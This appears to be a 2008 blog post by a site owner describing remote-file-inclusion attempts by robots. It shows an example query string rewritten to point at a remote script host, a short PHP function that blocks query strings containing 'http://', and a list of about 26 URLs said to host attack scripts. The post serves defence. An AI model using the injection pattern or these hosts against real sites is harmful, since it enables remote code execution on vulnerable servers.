Home    Files
software times™  Files...
April 26, 2008

Robot Hack Attack


Lately some nasty robots have been trying to hack my websites. The method they use is to attach a URL to a page that relies on a query string. For example, a page might have the following valid URL:

http://myDomain.com/somePage.php?img=3

The nasty robot transforms this URL to :

http://myDomain.com/somePage.php?img=http://afterwedding.eclub.lv/images

in the hope that my script will execute the script at

http://afterwedding.eclub.lv/images

(Yes, there is a script there)

The defense is really quite simple, any query string that contains "http://" is an offensive robot. My code to deal with them is as follows:
function check_hack_attack() {
    if (strpos ($_SERVER['QUERY_STRING'], 'http://') !== FALSE) {
        header("HTTP/1.1 400 Bad Request");
        // do a proper custom error 400
        include ("/path/to/error400.php");
        die();
    }
}

In simple English (pseudo code), this script does the following:

If the query contains 'http://' {
Send a 400 error header to the browser
Send the custom error 400 page to the browser
Stop processing
}

Here is a partial list of offending websites;
http://0xg3458.hub.io/pb.php?
http://amygirl.land.ru/baby?
http://amymusicgirl.h17.ru/mysong.txt?
http://amyru.h18.ru/images/cs.txt?
http://apacheparty.chat.ru/images?
http://cherrygirl.h18.ru/images/cs.txt?
http://himanhimanioum.chat.ru/man?
http://hotraebywka.chat.ru/images/girl?
http://kiopmanminsuion.chat.ru/http?
http://laudanskisucksss.chat.ru/placeholder/image
http://levispotparty.eclub.lv/images?
http://luckygoldpot.chat.ru/images?
http://musicgirl.front.ru/mysong?
http://myownmarriage.chat.ru/images?
http://myweddingphotos.by.ru/images?
http://ninaru.hut2.ru/images/cs.txt?
http://phonefamily.chat.ru/images?
http://rizlashome.chat.ru/images?
http://rumusic.chat.ru/rumusic.wav?
http://sandisshop.chat.ru/images?
http://smithswedding.chat.ru/images?
http://thepotparty.eclub.lv/images?
http://turiusisjsuisnsi.chat.ru/html/body?
http://visionswedding.chat.ru/images
http://xishisniceplace.chat.ru/images?
http://yurimusimsoumsis.chat.ru/body/head?
As you can see, it's just a few websites masquerading under a bunch of sub-domains.
by.ru
chat.ru
eclub.lv
front.ru
h17.ru
h18.ru
hub.io
land.ru
I wonder if someone can put a stop to this abuse.

Denny Schlesinger

Home    Files Top

Copyright © Software Times, 2000, 2001, 2003. All rights reserved
Last updated June 22, 2003